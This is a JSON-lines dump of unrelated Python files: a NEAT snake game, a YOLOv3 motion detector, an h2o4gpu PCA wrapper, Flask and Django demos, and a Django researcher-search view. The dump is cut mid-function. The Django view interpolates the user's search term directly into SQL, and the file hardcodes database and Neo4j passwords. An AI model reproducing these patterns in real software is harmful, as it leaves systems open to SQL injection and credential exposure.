nets.append(net)\n genome.fitness = 0\n while y<= 10000000:\n for i, snake in enumerate(snakes):\n gameLoop(genomes, config, i, y)\n y += 1\n\ndef run(config_path):\n global pop\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n config_path\n )\n\n pop = neat.Population(config)\n pop.run(eval_genomes, 10000000000)\n\n\nif __name__ == '__main__':\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config.txt')\n run(config_path)","sub_path":"Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":6093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"164681903","text":"from operator import itemgetter\nimport pandas as pd\n\niter=0\nwhile iter<100:\n data = pd.read_csv(\"result/set2/scores/rwr_result_set2_\"+str(iter)+\".txt\",delim_whitespace=\"\",header=None)\n list = []\n col1 = data[0]\n col2 = data[1]\n col3 = data[2]\n\n for i in range(len(data[0])):\n list.append((col1[i],col2[i],col3[i]))\n sort = sorted(list,key = lambda x:x[1],reverse=True)\n \n fp = open(\"result/set2/scores/rwr_result_set2_\"+str(iter)+\".txt\",\"w\")\n for i in range(len(sort)):\n row = sort[i]\n fp.write(str(row[0])+\",\"+str(row[1])+\",\"+str(row[2])+\"\\n\")\n iter+=1\n","sub_path":"prioritization_methods/rwr/randomize2/sort_res.py","file_name":"sort_res.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"437234155","text":"from Resultado import Resultado\nfrom Simulacion import Simulacion\nimport Operaciones\nimport os\nimport shutil\n\nmayoresGanancias = []\n\n\ndef CalculoSimulacion(rangoIni, rangoFinal, iteraciones):\n for i in range(1,iteraciones+1):\n simulacion = Simulacion(i)\n for mes in range(1,31):\n for revista in range(rangoIni, rangoFinal+1):\n resultado = Resultado(mes, revista)\n simulacion.AgregarResultado(resultado)\n\n simulacion.Imprimir()\n mayoresGanancias.append(simulacion.Get_GananciaMayor())\n\n Operaciones.ImprimirGanancias(mayoresGanancias)\n \ndef IniciarPrograma():\n try:\n print('Simulacion de la segunda política, desde el numero inicial de revistas x hasta y: \\n')\n iteraciones = int(input('Ingrese el número de simulaciones que deseas realizar:'))\n revistaInicial = int(input('Ingrese mínimo de número de revistas inicial:'))\n revistaFinal = int(input('Ingrese el máximo de revistas iniciales:'))\n\n if revistaFinal < revistaInicial:\n print('Ingrese un rango valido.')\n else:\n CalculoSimulacion(revistaInicial, revistaFinal, iteraciones)\n except Exception as e: \n print(\"Ha ocurrido un error por favor intente nuevamente\")\n print(\"Detalle del error:\", e)\n\nerror = False\nfolder = 'output/'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception:\n if error is False:\n print(\"El programa no ha podido eliminar todos los archivos excel, por favor cierrelos e intente nuevamente.\")\n error = True\n\nif error is False:\n IniciarPrograma()\n\n\n\n","sub_path":"politicaUno/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"341797997","text":"import cv2 as cv \nimport numpy as np \nimport random as rng\nimport darknet\nimport os\n\nrng.seed(12345)\n\nvideoPath = \"VID.mp4\"\nconfigPath = \"YOLOv3/yolov3.cfg\"\nweightPath = \"YOLOv3/yolov3.weights\"\n# configPath = \"YOLOv3/yolov3-tiny.cfg\"\n# weightPath = \"YOLOv3/yolov3-tiny.weights\"\nclassesPath = \"YOLOv3/coco.names\"\n\nif not os.path.exists(videoPath):\n raise ValueError(\"Invalid video path `\" + os.path.abspath(videoPath) + \"`\")\nif not os.path.exists(configPath):\n raise ValueError(\"Invalid config path `\" + os.path.abspath(configPath) + \"`\")\nif not os.path.exists(weightPath):\n raise ValueError(\"Invalid weight path `\" + os.path.abspath(weightPath) + \"`\")\nif not os.path.exists(classesPath):\n raise ValueError(\"Invalid classes path `\" + os.path.abspath(classesPath) + \"`\")\n\nwith open(classesPath, 'rt') as f:\n classes = f.read().rstrip('\\n').split('\\n')\n\nconfThreshold = 0.5\nnmsThreshold = 0.4\ninpWidth = 320\ninpHeight = 320\n\nnet = cv.dnn.readNetFromDarknet(configPath, weightPath)\nnet.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)\n# 获取输出层的名字\ndef getOutputsNames(net):\n layersNames = net.getLayerNames()\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# 取最大置信度的Bounding Box返回\n# 该函数不用了\ndef process(outs):\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n classIds.append(classId)\n confidences.append(float(confidence))\n \n if len(classIds) != 0:\n index = np.argsort(confidences)[-1]\n classId = classIds[index]\n # print(classes[classId], f'{confidences[index]:.2f}')\n label = f'{classes[classId]} {confidences[index]:.2f}'\n return label\n return None\n\ndef postProcess(roi, outs):\n height, width, channel = roi.shape\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n center_x = (int)(detection[0] * width)\n center_y = (int)(detection[1] * height)\n box_width = (int)(detection[2] * width)\n box_height = (int)(detection[3] * height)\n left = (int)(center_x - box_width / 2)\n top = (int)(center_y - box_height / 2)\n classIds.append(classId)\n confidences.append((float)(confidence))\n boxes.append([left, top, box_width, box_height])\n box_result = []\n conf_result = []\n class_result = []\n index = cv.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)\n for i in index:\n i = i[0]\n box_result.append(boxes[i])\n conf_result.append(confidences[i])\n class_result.append(classes[classIds[i]])\n \n print(class_result)\n return box_result, conf_result, class_result\n\ndef transform(box, roi_x, roi_y):\n for b in box:\n b[0] += roi_x\n b[1] += roi_y\n\n\nsurf = cv.xfeatures2d.SURF_create(1000)\n# surf = cv.xfeatures2d.SURF_create()\nFLANN_INDEX_KDTREE = 1\nMIN_MATCH_COUNT = 10\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 32)\nflann = cv.FlannBasedMatcher(index_params, search_params)\n\ncv.namedWindow(\"match\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame1\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame2\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"after dilate\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"draw contours\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"kp\", cv.WINDOW_NORMAL)\ncv.namedWindow(\"dst\", cv.WINDOW_NORMAL)\n\ncapture = cv.VideoCapture(videoPath)\nif not capture.isOpened():\n print(\"can not open the video\")\n exit()\n\nkernel = cv.getStructuringElement(cv.MORPH_RECT, (5, 5))\nret, frame2 = capture.read()\nrows, cols, ch = frame2.shape\nprint(\"rows = \", rows, \" cols = \", cols)\nframe2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\nframe2_gray = cv.blur(frame2_gray, (5, 5))\nkp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n\nRECT_MIN_WIDTH = 20\nRECT_MIN_HIGHT = 20\n\n# test = True\ntest = False\n\nwhile True:\n frame1 = frame2\n frame1_gray = frame2_gray\n kp1 = kp2\n des1 = des2\n\n ret, frame2 = capture.read()\n if not ret:\n break\n \n frame2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\n frame2_gray = cv.blur(frame2_gray, (5, 5))\n\n # kp1, des1 = surf.detectAndCompute(frame1, None)\n kp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n # 绘制特征点\n # kp_img = frame2.copy()\n # kp_img = cv.drawKeypoints(kp_img, kp2, kp_img)\n # cv.imshow(\"kp\", kp_img)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/key_points.jpg\", kp_img)\n # print(\"OK\");\n\n matches = flann.knnMatch(des1, des2, k = 2)\n # print(len(matches))\n good = []\n for m, n in matches:\n if m.distance < 0.7 * n.distance:\n good.append(m)\n if len(good) > MIN_MATCH_COUNT:\n frame1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n frame2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(frame1_pts, frame2_pts, cv.RANSAC, 5.0)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n print(M)\n \n matches_mask = mask.ravel().tolist()\n \n warp = cv.warpPerspective(frame1, M, (cols, rows))\n # cv.imshow(\"warp\", warp);\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/warp.jpg\", warp)\n # print(\"OK\")\n\n sub = cv.absdiff(frame2, warp)\n # cv.imshow(\"sub\", sub)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/sub.jpg\", sub)\n # print(\"OK\")\n\n sub = sub[20:rows - 20, 20:cols - 20]\n\n # con_img = sub.copy()\n\n # 通过实验测试,先进行阈值处理然后再转换成灰度图的效果\n # 比先转换成灰度图后再进行阈值处理的效果好\n ret2, dst = cv.threshold(sub, 50, 255, cv.THRESH_BINARY)\n dst_gray = cv.cvtColor(dst, cv.COLOR_BGR2GRAY)\n # dst_gray = cv.cvtColor(sub, cv.COLOR_BGR2GRAY)\n # ret2, dst_gray = cv.threshold(dst_gray, 80, 255, cv.THRESH_BINARY)\n\n # cv.imshow(\"threshold\", dst_gray)\n\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n cv.imshow(\"after dilate\", dst_gray)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/dilate.jpg\", dst_gray)\n print(\"OK\")\n\n # edges = cv.Canny(dst, 300, 450)\n # cv.imshow(\"edges\", edges)\n contours, hierarchy = cv.findContours(dst_gray, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n # cv.drawContours(con_img, contours, -1, 255, 1)\n # cv.imshow(\"draw contours\", con_img)\n if hierarchy is None:\n continue\n \n temp = frame2[20:rows - 20, 20:cols - 20].copy()\n for c in contours:\n rect = cv.boundingRect(c)\n color = (rng.randint(0, 255), rng.randint(0, 255), rng.randint(0, 255))\n x, y, w, h = rect\n # if cv.contourArea(c) > 200 and w < RECT_MAX_WIDTH and h < RECT_MAX_HIGHT \\\n # and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n if cv.contourArea(c) > 200 and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n label = None\n box = []\n if not test:\n roi = temp[y:y+h, x:x+w]\n blob = cv.dnn.blobFromImage(roi, 1/255, (inpWidth, inpHeight), [0, 0, 0], 1, crop=False)\n net.setInput(blob)\n outputName = getOutputsNames(net)\n outs = net.forward(outputName)\n # label = process(outs)\n box, conf, cla = postProcess(roi, outs)\n transform(box, x, y)\n t, _ = net.getPerfProfile()\n # print(\"Inference time: %.2f ms\" % (t * 1000.0 / cv.getTickFrequency()))\n\n if len(box) > 0:\n for i, b in enumerate(box):\n label = f'{cla[i]} {conf[i]:.2f}'\n tex_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n cv.rectangle(temp, (b[0], b[1]), (b[0] + b[2], b[1] + b[3]), color, 2)\n cv.rectangle(temp, (b[0], b[1] - tex_size[1]), (b[0] + tex_size[0], b[1]), color, cv.FILLED)\n cv.putText(temp, label, (b[0], b[1]), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n else:\n cv.rectangle(temp, (x, y), (x + w, y + h), color, 2)\n # if label and not test:\n # text_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n # cv.rectangle(temp, (x, y - text_size[1]), (x + text_size[0], y), color, cv.FILLED)\n # cv.putText(temp, label, (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n totalFrame = (int)(capture.get(cv.CAP_PROP_FRAME_COUNT))\n frameNum = (int)(capture.get(cv.CAP_PROP_POS_FRAMES))\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/rect3.jpg\", temp)\n print(\"OK\")\n text = \"current frame: \" + str(frameNum) + \"/\" + str(totalFrame)\n cv.putText(temp, text, (5, 20), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1)\n cv.imshow(\"dst\", temp)\n\n else:\n print(\"not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n matches_mask = None\n \n # draw_params = dict(matchColor = (0, 255, 0),\n # singlePointColor = None,\n # matchesMask = matches_mask,\n # flags = 2)\n # match = cv.drawMatches(frame1, kp1, frame2, kp2, good, None, **draw_params)\n\n # cv.imshow(\"match\", match)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/match.jpg\", match)\n # print(\"OK\")\n\n key = cv.waitKey(20)\n if key == ord('q'):\n break\n if key == ord('s'):\n cv.imwrite(\"pic/absdiff.jpg\", sub)\n if key == ord('m'):\n cv.imwrite(\"pic/match.jpg\", match)\n if key == ord('t'):\n cv.imwrite(\"pic/threshold.jpg\", dst_gray)\n \ncapture.release()\ncv.destroyAllWindows()\n\n","sub_path":"main_yolov3.py","file_name":"main_yolov3.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"299437490","text":"# - * - encoding : utf - 8 - * -\n\"\"\"\n:copyright: 2017 H2O.ai, Inc.\n:license: Apache License Version 2.0 (see LICENSE for details)\n\"\"\"\nimport numpy as np\nfrom ..libs.lib_pca import parameters\nfrom ..solvers.utils import _setter\nfrom ..solvers.truncated_svd import TruncatedSVDH2O, TruncatedSVD, _as_fptr\nfrom ..utils.extmath import svd_flip\n\n\nclass PCAH2O(TruncatedSVDH2O):\n \"\"\"Principal Component Analysis (PCA)\n\n Dimensionality reduction using truncated Singular Value Decomposition\n for GPU\n\n This implementation uses the ARPACK implementation of the truncated SVD.\n Contrary to SVD, this estimator does center the data before computing\n the singular value decomposition.\n\n :param: n_components Desired dimensionality of output data\n\n :param: whiten : bool, optional\n When True (False by default) the `components_` vectors are multiplied\n by the square root of (n_samples) and divided by the singular values to\n ensure uncorrelated outputs with unit component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making their data respect some hard-wired assumptions.\n \"\"\"\n\n def __init__(self, n_components=2, whiten=False):\n super().__init__(n_components)\n self.whiten = whiten\n self.n_components_ = n_components\n self.mean_ = None\n self.noise_variance_ = None\n\n # pylint: disable=unused-argument\n def fit(self, X, y=None):\n \"\"\"Fit PCA on matrix X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param y Ignored, for ScikitLearn compatibility\n\n :returns self : object\n\n \"\"\"\n self.fit_transform(X)\n return self\n\n # pylint: disable=unused-argument\n def fit_transform(self, X, y=None):\n \"\"\"Fit PCA on matrix X and perform dimensionality reduction\n on X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param: y Ignored, for ScikitLearn compatibility\n\n :returns X_new : array, shape (n_samples, n_components)\n Reduced version of X. This will always be a\n dense array.\n\n \"\"\"\n X = np.asfortranarray(X, dtype=np.float64)\n Q = np.empty(\n (self.n_components, X.shape[1]), dtype=np.float64, order='F')\n U = np.empty(\n (X.shape[0], self.n_components), dtype=np.float64, order='F')\n w = np.empty(self.n_components, dtype=np.float64)\n explained_variance = np.empty(self.n_components, dtype=np.float64)\n explained_variance_ratio = np.empty(self.n_components, dtype=np.float64)\n mean = np.empty(X.shape[1], dtype=np.float64)\n param = parameters()\n param.X_m = X.shape[0]\n param.X_n = X.shape[1]\n param.k = self.n_components\n param.whiten = self.whiten\n\n lib = self._load_lib()\n lib.pca(\n _as_fptr(X), _as_fptr(Q), _as_fptr(w), _as_fptr(U),\n _as_fptr(explained_variance), _as_fptr(explained_variance_ratio),\n _as_fptr(mean), param)\n\n self._w = w\n self._U, self._Q = svd_flip(U, Q) # TODO Port to cuda?\n self._X = X\n n = X.shape[0]\n # To match sci-kit #TODO Port to cuda?\n self.explained_variance = self.singular_values_**2 / (n - 1)\n self.explained_variance_ratio = explained_variance_ratio\n self.mean_ = mean\n\n # TODO noise_variance_ calculation\n # can be done inside lib.pca if a bottleneck\n n_samples, n_features = X.shape\n total_var = np.var(X, ddof=1, axis=0)\n if self.n_components_ < min(n_features, n_samples):\n self.noise_variance_ = \\\n (total_var.sum() - self.explained_variance_.sum())\n self.noise_variance_ /= \\\n min(n_features, n_samples) - self.n_components\n else:\n self.noise_variance_ = 0.\n\n X_transformed = U * w\n return X_transformed\n\n # Util to load gpu lib\n def _load_lib(self):\n from ..libs.lib_pca import GPUlib\n\n gpu_lib = GPUlib().get()\n\n return gpu_lib\n\n\nclass PCA(TruncatedSVD):\n \"\"\"\n PCA Wrapper\n\n Selects between h2o4gpu.decomposition.PCASklearn\n and h2o4gpu.solvers.pca.PCAH2O\n\n Documentation:\n import h2o4gpu.decomposition ;\n help(h2o4gpu.decomposition.PCASklearn)\n help(h2o4gpu.solvers.pca.PCA)\n\n :param: backend : Which backend to use. Options are 'auto', 'sklearn',\n 'h2o4gpu'. Default is 'auto'.\n Saves as attribute for actual backend used.\n\n \"\"\"\n\n # pylint: disable=unused-argument\n def __init__(self,\n n_components=2,\n copy=True,\n whiten=False,\n svd_solver=\"arpack\",\n tol=0.,\n iterated_power=\"auto\",\n random_state=None,\n verbose=False,\n backend='auto'):\n super().__init__(n_components, random_state, tol, verbose, backend)\n self.svd_solver = svd_solver\n self.whiten = whiten\n\n import os\n _backend = os.environ.get('H2O4GPU_BACKEND', None)\n if _backend is not None:\n backend = _backend\n\n # Fall back to Sklearn\n # Can remove if fully implement sklearn functionality\n self.do_sklearn = False\n if backend == 'auto':\n params_string = [\n 'svd_solver', 'random_state', 'tol', 'iterated_power'\n ]\n params = [svd_solver, random_state, tol, iterated_power]\n params_default = ['arpack', None, 0., 'auto']\n\n i = 0\n for param in params:\n if param != params_default[i]:\n self.do_sklearn = True\n if verbose:\n print(\"WARNING:\"\n \" The sklearn parameter \" + params_string[i] +\n \" has been changed from default to \" +\n str(param) + \". Will run Sklearn PCA.\")\n self.do_sklearn = True\n i = i + 1\n elif backend == 'sklearn':\n self.do_sklearn = True\n elif backend == 'h2o4gpu':\n self.do_sklearn = False\n if self.do_sklearn:\n self.backend = 'sklearn'\n else:\n self.backend = 'h2o4gpu'\n\n from h2o4gpu.decomposition.pca import PCASklearn\n self.model_sklearn = PCASklearn(\n n_components=n_components,\n copy=copy,\n whiten=whiten,\n svd_solver=svd_solver,\n tol=tol,\n iterated_power=iterated_power,\n random_state=random_state)\n self.model_h2o4gpu = PCAH2O(n_components=n_components, whiten=whiten)\n\n if self.do_sklearn:\n self.model = self.model_sklearn\n else:\n self.model = self.model_h2o4gpu\n\n def set_attributes(self):\n s = _setter(oself=self, e1=NameError, e2=AttributeError)\n s('oself.components_ = oself.model.components_')\n s('oself.explained_variance_= oself.model.explained_variance_')\n s('oself.explained_variance_ratio_ = '\n 'oself.model.explained_variance_ratio_')\n s('oself.singular_values_ = oself.model.singular_values_')\n s('oself.mean_ = oself.model.mean_')\n s('oself.n_components_ = oself.model.n_components_')\n s('oself.noise_variance_ = oself.model.noise_variance_')\n","sub_path":"src/interface_py/h2o4gpu/solvers/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"233540736","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\n# 配置数据库连接地址\napp.config['SQLALCHEMY_DATABASE_URI'] = \"mysql://root:mysql@127.0.0.1:3306/test_27\"\n# 是否追踪数据库的修改\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# 初始化 SQLAlchemy 对象\ndb = SQLAlchemy(app)\n\n\n# 角色 1的一方\nclass Role(db.Model):\n # 指定该模型对应数据库中的表名,如果不指定为类名小写\n __tablename__ = \"roles\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # backref 在这行代码的作用是:给前面的 User添加一个属性,名字叫backref的值\n # 以便可以直接通过 user.role 方法到一的一方的数据\n users = db.relationship('User', backref='role')\n\n def __repr__(self):\n return 'Role %d %s' % (self.id, self.name)\n\n# service mysql restart\n# service mysql stop\n# service mysql start\n# 用户 多的一方\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # 添加外键记录一的一方的主键id,为了能够直接查询出一的一方的数据\n role_id = db.Column(db.Integer, db.ForeignKey(Role.id))\n\n def __repr__(self):\n return 'User %d %s' % (self.id, self.name)\n\n\n\n\n\n# 需求,查询user所对应的role数据\n# select * from role where id = user.role_id\n\n# 需求,查询role所对应的所有user数据\n# select * from user where role_id = role.id\n\n@app.route('/')\ndef index():\n return 'index'\n\n\nif __name__ == '__main__':\n db.drop_all()\n db.create_all()\n\n ro1 = Role(name='admin')\n ro2 = Role(name='user')\n db.session.add_all([ro1, ro2])\n db.session.commit()\n\n user1 = User(name='laowang', role_id=ro1.id)\n user2 = User(name='laoli', role_id=ro1.id)\n user3 = User(name='laozhang', role_id=ro2.id)\n\n db.session.add_all([user1, user2, user3])\n db.session.commit()\n\n app.run(debug=True)\n","sub_path":"Flask_Demo_All/Flask_day03/demo6_sqlalchemy.py","file_name":"demo6_sqlalchemy.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402969648","text":"from django.shortcuts import render, redirect\nfrom med.models import Manager, Engineer, Doctor\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserUpdateForm\n\n\n# Create your views here.\ndef home(request):\n # try : \n #print(x) not defind\n #except:\n #print('error') excute\n try:\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : doc})\n elif(request.user.type =='MANAGER'):\n man = Manager.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : man})\n except:\n return render(request, template_name='dashboard/HomePage.html')\n \n \n@login_required\ndef profile(request):\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : doc})\n else:\n return render(request, template_name='dashboard/profile.html')\n\n@login_required\ndef update_profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST,request.FILES, instance=request.user)\n if u_form.is_valid():\n u_form.save()\n # messages.success(request, f'Account Info Updated!!')\n return redirect('profile')\n else:\n # messages.faliure(request, f'An error has occured!')\n return redirect('profile')\n \n context = {\n 'u_form' : UserUpdateForm(instance=request.user),\n }\n return render(request, \"dashboard/update_profile.html\", context) ","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"180253337","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom sqlalchemy import MetaData, create_engine\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom collections import namedtuple, defaultdict\nfrom py2neo import Graph, Relationship, NodeMatcher, Node\nfrom django.contrib.postgres.search import SearchVector\nfrom django.contrib.auth import get_user_model\nfrom account.models import Profile\n\nUser = get_user_model()\n\ngraph = Graph(host='neo4j_db', password='_genius01_', scheme='bolt')\n\nmeta = MetaData()\nengine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/keywordsdw')\nconn = engine.connect()\n\npub_engine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/pubdw')\npubconn = pub_engine.connect()\n\nResearcher = namedtuple('Researcher', ['id', 'firstname', 'lastname',\n 'word_en', 'count', 'affiliation',\n 'total_abstract' ,'sc'])\n\n# Create your views here.\ndef res_list(request):\n search_term = request.GET.get('q')\n res_list = []\n nounchunks = []\n if search_term:\n if len(search_term.split(' ')) > 1:\n tsquery = ' & '.join(search_term.split(' '))\n tsquery_word = ' | '.join(search_term.split(' '))\n else:\n tsquery = search_term\n tsquery_word = search_term\n query = (\"select id, chunk_en from noun_chunks where \"\n \"to_tsvector(chunk_en) @@ to_tsquery('%s');\")\n nounchunks += conn.execute(query % tsquery).fetchall()\n results = conn.execute(\"select distinct keywords.id, first_name, last_name, word_en, count, affils.name\"\n \" from keywords inner join affils on keywords.affil_scopus_id=affils.scopus_id \"\n \"where to_tsvector(word_en) @@ to_tsquery('%s')\"\n \" order by count desc\" % tsquery_word).fetchall()\n if results:\n for rec in results:\n query = ('select count(*) from abstracts inner join abstract_has_keywords '\n 'on abstract_has_keywords.abstract_id=abstracts.id '\n 'inner join keywords on keywords.id=abstract_has_keywords.keyword_id '\n 'where keywords.id=%d;')\n total_abstract = conn.execute(query % int(rec[0])).scalar()\n\n fname = rec[1].replace(\"'\", \"\\'\") if rec[1] else ''\n lname = rec[2].replace(\"'\", \"\\'\") if rec[2] else ''\n\n query = (\"select id,scholarship_info_id from authors where lower(first_name)=lower(%s) \"\n \"and lower(last_name)=lower(%s)\")\n _author = conn.execute(query, (fname, lname)).fetchone()\n if _author:\n _author_id, _sc_id = _author[0], _author[1]\n if _author_id:\n if _sc_id:\n sc = True\n else:\n sc = False\n res_list.append(Researcher(_author_id, rec[1], rec[2], rec[3], rec[4], rec[5], total_abstract, sc))\n\n\n profiles = {}\n for word in search_term.split(' '):\n for p in Profile.objects.annotate(\n search=SearchVector('field_of_interest')).filter(search=word):\n field_of_interest = (f.strip() for f in p.field_of_interest.split(','))\n profiles[p.user.username] = (p.user.first_name, p.user.last_name, field_of_interest)\n\n authors = []\n query = (\"select id, first_name,last_name from authors where \"\n \"lower(first_name)=lower(%s) or lower(last_name)=lower(%s);\")\n for id, first_name, last_name in conn.execute(query, (search_term,search_term)):\n authors.append((id,first_name,last_name))\n\n return render(request, template_name='analytics/res_list.html',\n context={'search_term': search_term, 'results': res_list,\n 'nounchunks': nounchunks, 'profiles': profiles,\n 'authors': authors})\n\ndef noun_chunk_detail(request):\n nc_id = request.GET.get('ncid')\n abstracts_list = []\n if nc_id:\n nc = conn.execute('select chunk_en from noun_chunks where id=%d' % int(nc_id)).fetchone()[0]\n query = (\"select abstracts.id, title_en, pub_date, cited from abstracts \"\n \"inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id \"\n \"inner join noun_chunks on noun_chunks.id=abstract_has_nounchunk.noun_chunk_id \"\n \"where noun_chunks.id=%d;\")\n for rec in conn.execute(query % int(nc_id)).fetchall():\n _bag = {'abstract': rec}\n _bag['authors'] = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n _bag['nounchunks'] = conn.execute(\"select noun_chunks.* from abstracts inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id inner join \"\n \"noun_chunks on abstract_has_nounchunk.noun_chunk_id=noun_chunks.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n abstracts_list.append(_bag)\n\n else:\n nc = ''\n return render(request, template_name='analytics/nounchunk_abs.html',\n context={'noun_chunk': nc, 'abstracts': abstracts_list})\n\ndef show_profile(request, author_id):\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n author = conn.execute('select * from authors where id=%s' % author_id).fetchone()\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n author_scopus_id = author[3]\n if author:\n query = (\"select word_en from keywords where author_scopus_id='%s'\" % author_scopus_id)\n results = conn.execute(query).fetchall()\n keywords = []\n for rec in results:\n keywords.append(rec[0])\n\n query = (\"select abstracts.id,abstracts.title_en from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author_id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n 